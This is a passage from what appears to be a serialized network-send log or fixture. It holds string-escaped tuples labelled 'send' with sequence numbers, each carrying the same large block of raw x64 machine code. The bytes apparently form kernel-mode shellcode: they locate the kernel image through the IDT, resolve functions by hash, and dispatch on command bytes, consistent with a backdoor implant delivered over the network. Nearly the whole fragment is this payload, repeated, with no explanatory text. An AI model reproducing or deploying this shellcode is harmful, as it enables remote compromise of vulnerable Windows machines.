xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 12, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 13, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 14, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
